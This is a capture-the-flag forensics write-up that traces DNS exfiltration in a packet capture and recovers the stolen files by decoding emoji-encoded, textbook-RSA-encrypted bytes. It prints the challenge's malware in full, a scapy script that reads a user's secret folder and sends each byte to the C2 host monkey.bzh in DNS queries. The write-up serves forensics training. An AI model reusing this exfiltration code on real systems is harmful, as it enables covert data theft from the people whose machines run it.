[CTF] InterIUT – Forensics

The CTF had the usual categories, but today I am going to write up the forensics series. It consists of three challenges built on the same .pcapng file. The second one was solved by my teammate SoEasY (he has some nice stuff on his website, in particular about reverse engineering, check it out). Regardless, I am going to explain all three of them.

Part 1

Le SOC de Random Corp a detecte une activite suspecte sur le reseau. Apparemment des donnees auraient ete exfiltres depuis le poste de Brian. Apres interrogation pas la DSI, Brian a avoue avoir execute volontairement un programme malicieux.
Retrouvez le nom du fichier malveillant qui a ete telecharge.

Format du flag : H2G2{nom_du_fichier.extension}

The Random Corp SOC has detected some suspicious activity on their network. Apparently, some data has been exfiltrated from Brian's computer. After being questioned by the IT department (DSI), Brian admitted that he had voluntarily executed a malicious program.
Find the name of the malicious file that was downloaded.
Flag format: H2G2{nom_du_fichier.extension}

The first challenge is to find the malicious file that was downloaded. I am going to use Wireshark throughout the three parts. Wireshark can list every file transferred over HTTP in the capture, and it also lets you save those files yourself.

Just go to File > Export Objects > HTTP. Right at the top, we get a file named the_game.py downloaded from monkey.bzh:8080. If you take a look at the other files, nothing looks suspicious about their file names or domain names.

Now just hit save, and we can take a look at the content of the file.

#!/usr/bin/env python3
# coding: utf8

from scapy.all import *
from Crypto.PublicKey import RSA
from binascii import hexlify
import base64
from random import randint
from os import listdir
from os.path import isfile, join

C2 = "monkey.bzh"

KEY = RSA.generate(4096, e=3)

def start_exfiltration(f_name: str):
    m = base64.b64encode((f"Starting exfiltration of the file {f_name}").encode())
    sr1(IP(dst=C2)/UDP(sport=RandShort(),dport=53)/DNS(rd=1,qd=DNSQR(qname=format_query(m),qtype="A")),timeout=randint(1,10))


def end_exfiltration(f_name: str):
    m = base64.b64encode(f"The file {f_name} has been extracted".encode())
    sr1(IP(dst=C2)/UDP(dport=53)/DNS(rd=1,qd=DNSQR(qname=format_query(m))),verbose=0,timeout=randint(1,10))


def exfiltrate_data(message):
    m = base64.b64encode(message.encode())
    sr1(IP(dst=C2)/UDP(dport=53)/DNS(rd=1,qd=DNSQR(qname=format_query(m))),verbose=0,timeout=randint(1, 10))


def format_query(message: bytes) -> bytes:
    message = message.decode()
    n = 32
    data = [message[i:i+n] for i in range(0, len(message), n)]
    url = '.'.join(data) + '.' + C2
    return url.encode()


def lambdhack_like_rsa(f_name: str):
    with open(f_name, "rb") as f:
        data = f.read(1)
        while data:
            flag = int(hexlify(data),16)
            encoded = pow(flag, KEY.e, KEY.n)
            exfiltrate_data(i_m_a_monkey(encoded))
            data = f.read(1)


def i_m_a_monkey(i_wanna_be_a_monkey):
    my_super_monkey = ""
    for monkey in str(i_wanna_be_a_monkey):
        monkey = int(monkey)
        my_super_monkey += int(monkey/5)*"🙈" + int(monkey%5)*"🙉" + "🙊🙊"
    return my_super_monkey


if __name__=='__main__':
    PATH = "/home/Brian/.secret/"
    FILES = [f for f in listdir(PATH) if isfile(join(PATH, f))]
    for f in FILES:
        start_exfiltration(PATH + f)
        lambdhack_like_rsa(PATH + f)
        end_exfiltration(PATH + f)

We can see at the very beginning a function called start_exfiltration(). Chances are this is our file 🙂 . We will come back to this file and take a closer look at it in part 3 😉 .

The flag is H2G2{the_game.py}.

Part 2

Maintenant que vous avez retrouve le programme malveillant, le SOC vous demande de retrouver les noms des fichiers qui ont ete exfiltres.
Format du flag : H2G2{fichier_exfiltre1.extension,fichier_exfiltre2.extension,…}

Now that you've found the program, the SOC asks you to find out the names of the stolen files.
Flag format is : H2G2{fichier_exfiltre1.extension,fichier_exfiltre2.extension,…}

So now we need to find which files were exfiltrated. Let's go back and take another look at the script.

In the main block, we easily get the directory the files were stolen from: "/home/Brian/.secret/". But how do we find the file names?
Well, the script sends status messages throughout the exfiltration, such as "Starting exfiltration of the file {f_name}" or "The file {f_name} has been extracted". Both times, the string is passed through the base64.b64encode() function, which encodes in... base64 (I know, shocking, right?). Unlike a hash, the start of a base64-encoded string does not change when you append something to the original string, because every group of 3 input bytes is encoded independently into 4 characters. So basically, we can search for the encoding of the known text that precedes the file name.
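To make this concrete, here is a small sketch that computes the part of the base64 output that cannot change, whatever the file name is. The helper name stable_prefix is mine (it is not part of the challenge), and the known text comes from end_exfiltration() in the script above.

```python
import base64

# Known start of the message built by end_exfiltration() in the malware.
known = b"The file /home/Brian/.secret/"

def stable_prefix(plain: bytes) -> str:
    """Return the base64 characters that stay identical when data is appended."""
    # Only complete 3-byte groups are final; a trailing partial group depends
    # on the bytes that follow it.
    whole = len(plain) - len(plain) % 3
    return base64.b64encode(plain[:whole]).decode()

needle = stable_prefix(known)
print(needle)

# Sanity check with an arbitrary (made-up) file name appended.
full = base64.b64encode(known + b"anything.bin has been extracted").decode()
assert full.startswith(needle)
```

Keep in mind that format_query() cuts the encoded text into 32-character DNS labels, so in the capture only the first 32 characters of this prefix are guaranteed to be contiguous.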

Let's run the strings command on the capture file to display every printable string it contains, and pipe the output into grep to look for the desired string. Drop the last few characters of the search pattern, because the final base64 characters depend on what follows (and on padding), and prefer a short pattern to maximize your chances of getting a match.
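If you prefer to stay in Python, the same idea can be sketched roughly as follows. This is only an approximation of strings piped into grep (the function name grep_strings and the fake packet are mine, for illustration), and for a capture of several gigabytes you would probably want to read the file in chunks or memory-map it instead of loading it whole.

```python
import re
from typing import List

def grep_strings(blob: bytes, needle: bytes, min_len: int = 4) -> List[str]:
    """Rough equivalent of `strings | grep`: printable ASCII runs containing needle."""
    runs = re.findall(rb"[\x20-\x7e]{%d,}" % min_len, blob)
    return [run.decode("ascii") for run in runs if needle in run]

# Hypothetical fragment of a DNS query: each label is preceded by its length byte.
label1 = b"VGhlIGZpbGUgL2hvbWUvQnJpYW4vLnNl"
label2 = b"Y3JldC9mbGFnLnR4dCBoYXMgYmVlbiBl"
fake_packet = (
    b"\x00\x01"
    + bytes([len(label1)]) + label1
    + bytes([len(label2)]) + label2
    + b"\x06monkey\x03bzh\x00"
)

hits = grep_strings(fake_packet, label1)
print(hits)
```

A 32-character label has the length byte 0x20, which is an ASCII space. That is presumably why the results show a space between the two 32-character halves.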

The search returns the following results (each one appears twice):

VGhlIGZpbGUgL2hvbWUvQnJpYW4vLnNl Y3JldC9Db25maWRlbnRpYWwucGRmIGhh
VGhlIGZpbGUgL2hvbWUvQnJpYW4vLnNl Y3JldC9Db25maWRlbnRpYWwuanBnIGhh
VGhlIGZpbGUgL2hvbWUvQnJpYW4vLnNl Y3JldC9mbGFnLnR4dCBoYXMgYmVlbiBl

Now let's decode them:
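Any base64 decoder will do. As a minimal sketch in Python (decode_hit is just a name I picked), using the three strings found above:

```python
import base64

hits = [
    "VGhlIGZpbGUgL2hvbWUvQnJpYW4vLnNl Y3JldC9Db25maWRlbnRpYWwucGRmIGhh",
    "VGhlIGZpbGUgL2hvbWUvQnJpYW4vLnNl Y3JldC9Db25maWRlbnRpYWwuanBnIGhh",
    "VGhlIGZpbGUgL2hvbWUvQnJpYW4vLnNl Y3JldC9mbGFnLnR4dCBoYXMgYmVlbiBl",
]

def decode_hit(hit: str) -> str:
    # The space only separates two 32-character DNS labels, so remove it
    # before decoding. 64 characters decode cleanly without padding.
    return base64.b64decode(hit.replace(" ", "")).decode("ascii")

for hit in hits:
    print(decode_hit(hit))
```

The decoded text is cut off after 48 bytes, which is why each message stops mid-sentence, but the file names are complete.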

The flag is : H2G2{Confidential.pdf,Confidential.jpg,flag.txt}

Part 3

Le SOC vous indique que les fichiers ont ete supprimes et que aucune backup n'a ete faite. Retrouvez le contenu des fichiers.

The SOC informs you that the files were deleted and that no backup was made. Recover the content of the files.

When searching for the string "monkey.bzh", you'll find a lot of strange strings. Let's apply a filter to keep only the DNS traffic (UDP port 53) involving the address 172.25.0.3:

udp.srcport==53&&ip.addr==172.25.0.3

With the filter applied, Wireshark is also way less laggy.

Before moving on, we have to understand what's going on in the lambdhack_like_rsa() function, to know what the data we are looking for looks like (see the script in Part 1 😉 ).

First, it opens the file. The f.read(1) instruction reads one byte from the file object f. The byte is converted to a hexadecimal string, which is then converted to an integer. The pow() function is then called with that integer and the e and n values of the RSA key generated at the beginning of the script, which encrypts the byte with textbook RSA (no padding). Finally, it calls the exfiltration function.
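Here is a small sketch of what happens to a single byte. The real modulus is not known, so N_STAND_IN is a made-up number that only has the size of a 4096-bit modulus (it is not a real RSA modulus); encrypt_byte is my own name for the steps inside lambdhack_like_rsa().

```python
from binascii import hexlify

E = 3
# Assumption: a stand-in with the bit length of a 4096-bit modulus, NOT a real key.
N_STAND_IN = (1 << 4095) + 1

def encrypt_byte(data: bytes, e: int = E, n: int = N_STAND_IN) -> int:
    """Mirror the per-byte steps of the malware: bytes -> hex -> int -> pow()."""
    flag = int(hexlify(data), 16)  # for a single byte this equals data[0]
    return pow(flag, e, n)

print(encrypt_byte(b"%"))
print(encrypt_byte(b"\xff"))
```

Since a byte is at most 255, its cube is at most 16581375, so the modular reduction never kicks in with a modulus of that size.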

This is the interesting part. The encrypted value, written in decimal, is converted to monkey emojis with this line:

my_super_monkey += int(monkey/5)*"🙈" + int(monkey%5)*"🙉" + "🙊🙊"

It loops through every digit of the number and converts it to emojis. For example, the digit 7 becomes 🙈🙉🙉🙊🙊 because in Python int(7/5) = 1 and 7%5 = 2. In other words, each 🙈 counts for 5, each 🙉 counts for 1, and 🙊🙊 closes the digit. With this rule, you can build a table with the emoji translation of each of the ten digits (0 to 9).
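A minimal sketch of the encoding and its inverse, under the rule described above (the function names are mine, the malware only contains the encoding side):

```python
SEP = "🙊🙊"  # closes every digit

def encode_digit(d: int) -> str:
    """One decimal digit: a 🙈 per 5, a 🙉 per 1, then the separator."""
    return (d // 5) * "🙈" + (d % 5) * "🙉" + SEP

def encode_number(n: int) -> str:
    return "".join(encode_digit(int(c)) for c in str(n))

def decode_number(monkeys: str) -> int:
    # Map each emoji group (without separator) back to its digit; 0 is "".
    table = {encode_digit(d)[:-len(SEP)]: str(d) for d in range(10)}
    parts = monkeys.split(SEP)[:-1]  # the element after the last separator is empty
    return int("".join(table[p] for p in parts))

print(encode_digit(7))
print(decode_number(encode_number(50653)))
```

Because the digit groups never contain 🙊, splitting on 🙊🙊 is unambiguous, even when a 0 (an empty group) appears in the middle of the number.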

Let's go back to Wireshark. We notice several packets containing strange printable strings. These are DNS queries sent over UDP (the protocol used by the exfiltration script, if you look at it again). Looking at the content, you'll see 3 different strings coming back over and over. They are probably our monkeys. Let's check it out.

If you base64-decode one of these strings, you get a sequence of monkey emojis.
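As a sketch, here is how one query name can be decoded in Python. The name used is the sample that appears in the JSON export shown further down in this write-up; payload_from_qname is a helper name I made up.

```python
import base64

C2 = "monkey.bzh"
qname = (
    "8J+ZiPCfmYrwn5mK8J+ZivCfmYrwn5mI."
    "8J+ZifCfmYrwn5mK8J+ZiPCfmYrwn5mK."
    "8J+ZifCfmYnwn5mJ8J+ZivCfmYo=."
    "monkey.bzh"
)

def payload_from_qname(name: str, c2: str = C2) -> str:
    """Strip the C2 domain, glue the labels back together and decode the base64."""
    labels = name[: -len(c2) - 1].split(".")  # drop the trailing ".monkey.bzh"
    return base64.b64decode("".join(labels)).decode("utf-8")

monkeys = payload_from_qname(qname)
print(monkeys)
```

The labels have to be joined before decoding, because format_query() cut the base64 text every 32 characters without regard to its content.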

Great ! The last step is to write a script that recovers the files based on our previous observations. First, let's export the data from Wireshark.

File > Export Packet Dissections > As JSON

This will generate a large JSON file, with several objects looking like this :

  {
    "_index": "packets-2020-11-24",
    "_type": "doc",
    "_score": null,
    "_source": {
      "layers": {

          [...],

          "Queries": {
            "8J+ZiPCfmYrwn5mK8J+ZivCfmYrwn5mI.8J+ZifCfmYrwn5mK8J+ZiPCfmYrwn5mK.8J+ZifCfmYnwn5mJ8J+ZivCfmYo=.monkey.bzh: type A, class IN": {
              "dns.qry.name": "8J+ZiPCfmYrwn5mK8J+ZivCfmYrwn5mI.8J+ZifCfmYrwn5mK8J+ZiPCfmYrwn5mK.8J+ZifCfmYnwn5mJ8J+ZivCfmYo=.monkey.bzh",
              "dns.qry.name.len": "105",
              "dns.count.labels": "5",
              "dns.qry.type": "1",
              "dns.qry.class": "0x00000001"
            }
          }
        }
      }
    }
  }

There are faster ways to solve this (mine is slow because I am parsing the JSON file at the same time, but it works 🙂 ) but here is what I came up with:

import json, base64
from binascii import unhexlify
from Crypto.PublicKey import RSA

FILES=["Confidential.pdf","Confidential.jpg","flag.txt"]
# Messages sent by end_exfiltration(): each one marks the end of a file
ERRORS=["The file /home/Brian/.secret/" + name + " has been extracted" for name in FILES]
FILE="Confidential.pdf"
NEW_FILE = b''
# table[d] is the emoji encoding of digit d, without the trailing "🙊🙊"
table = ["", "🙉","🙉🙉", "🙉🙉🙉","🙉🙉🙉🙉",
        "🙈", "🙈🙉", "🙈🙉🙉", "🙈🙉🙉🙉", "🙈🙉🙉🙉🙉"]
# Not the attacker's key: any key with e=3 works here (explained below)
KEY = RSA.generate(4096, e=3)

def changeFile():
    # Write the bytes recovered so far, then move on to the next file name
    global FILE, FILES, NEW_FILE
    with open(FILE, "wb") as f:
        f.write(NEW_FILE)
    NEW_FILE = b''
    next_index = FILES.index(FILE) + 1
    if next_index < len(FILES):
        FILE = FILES[next_index]


with open("files.json", 'rb') as f:
    content = json.load(f)

ind = 0
for i in content:
    json_object = i["_source"]["layers"]["dns"]["Queries"].items()
    for key, value in json_object:
        line = value["dns.qry.name"].replace('.monkey.bzh',"")
        # b64decode() discards the dots left between the DNS labels
        unicode = base64.b64decode(line).decode('utf-8', "replace")

        if unicode in ERRORS:
            changeFile()
        elif unicode.startswith("Starting exfiltration"):
            # Start-of-file message: it carries no file data
            continue
        else:
            char = unicode.split("🙊🙊")

            octet = ""
            for j in char:
                octet += str(table.index(j))

            # split() leaves an empty last element, which shows up as a
            # spurious trailing "0": drop it
            octet = int(octet[:-1])
            decipher = hex(pow(octet, KEY.d, KEY.n))
            decipher = str(decipher).replace('0x',"").strip()
            if len(decipher) == 1:
                decipher = "0"+decipher
            h = unhexlify(decipher)

            ind += 1
            if ind%100 == 0:
                print(ind)
            NEW_FILE += h

Let's break some parts down.

First I open the JSON file and save the content in a variable after parsing it as JSON. This allows me to loop through the first-level objects and to get the base64-encoded string by using the JSON key/value system. Don't get confused by the for key, value in json_object: loop. I just had to split the string recovery into two parts, because the query string itself is used as a key at one level of the JSON.

The base64 is then decoded and the resulting emoji string is stored in the unicode variable. I use the strings stored in ERRORS as separators between the 3 files, so if the content of unicode is one of the three strings, the file is written and we switch to the next file.

You'll notice the translation table at the start. I got rid of the "🙊🙊" present at the end of each digit, as they will be used as separators. Each translation is stored at the index representing the digit.

Once I've recovered the decimal representation, I have to bypass the RSA encryption. In our case, it's "fairly" easy. The public exponent equals 3 and there is no padding, so when the message is small enough, a simple cube root does the job. This article gives a good explanation of how the exploit works. Here it's not even necessary: each message is a single byte, so its cube is far smaller than the 4096-bit modulus and is never reduced modulo n. As a result, any randomly generated key with e = 3 will decrypt it 🙂
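For comparison, here is a sketch of the cube root route, which is not what my script does but avoids generating a key and doing a 4096-bit modular exponentiation for every byte. The names icbrt, CUBES and decrypt_byte are mine, and it assumes (as explained above) that every ciphertext is the plain cube of a byte.

```python
def icbrt(c: int) -> int:
    """Exact integer cube root by binary search; raises if c is not a perfect cube."""
    lo, hi = 0, 1
    while hi ** 3 < c:
        hi *= 2
    while lo < hi:
        mid = (lo + hi) // 2
        if mid ** 3 < c:
            lo = mid + 1
        else:
            hi = mid
    if lo ** 3 != c:
        raise ValueError("not a perfect cube")
    return lo

# With only 256 possible plaintexts, a lookup table works just as well.
CUBES = {m ** 3: m for m in range(256)}

def decrypt_byte(c: int) -> bytes:
    return bytes([CUBES[c]])

print(icbrt(50653), decrypt_byte(50653))
```

50653 is the value carried by the sample query shown in the JSON export above. It is the cube of 37, i.e. the byte 0x25 ("%"), which fits a file starting with a %PDF header.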

The end of the script is just about converting the decrypted integer back to its hexadecimal form, adding a leading zero if necessary (a byte's hexadecimal representation should always be two characters long), and appending it to the previously decoded bytes.
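As a side note, this conversion can be written more compactly. The sketch below (helper names are mine) shows the hex-with-padding approach next to a direct conversion; both give the same byte.

```python
from binascii import unhexlify

def byte_from_int_hex(m: int) -> bytes:
    """Same idea as the script: hex string, left-padded to two characters."""
    return unhexlify(format(m, "02x"))

def byte_from_int(m: int) -> bytes:
    """Direct conversion, no string handling needed."""
    return bytes([m])

print(byte_from_int_hex(5), byte_from_int(5))
```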

In the end, if you're patient enough, you should get a PDF (which is the longest file to recover) with the flag in it, a JPG image, and a text file (which are both fakes 😉 ).

H2G2{DN5_3xf1l7r4710n_15_funny!!!}

Conclusion

The challenges were overall really interesting and fun to solve. I am just a bit disappointed because my solution for part 3 was really slow: even though the script was already running before the end, I got the flag a few minutes after the competition ended 🙂 (from 3rd place to 7th, lol).
Another thing I regret is the size of the capture file... It was over 2 GB. True, it's more realistic that way and it forces you to use filters smartly, but every time you change your filters or display any information, everything slows down. And in my opinion, when a competition only lasts a weekend, it's nice to have some time to try out different kinds of challenges and not be stuck in one category.

However, the CTF was really nice, and the admins really put some effort in. I am really excited to participate again next year ! 🙂

I hope you enjoyed the write-up. It's a bit longer than usual (it took me longer to write as well), but I believe these challenges were worth explaining and are a good introduction to DNS exfiltration.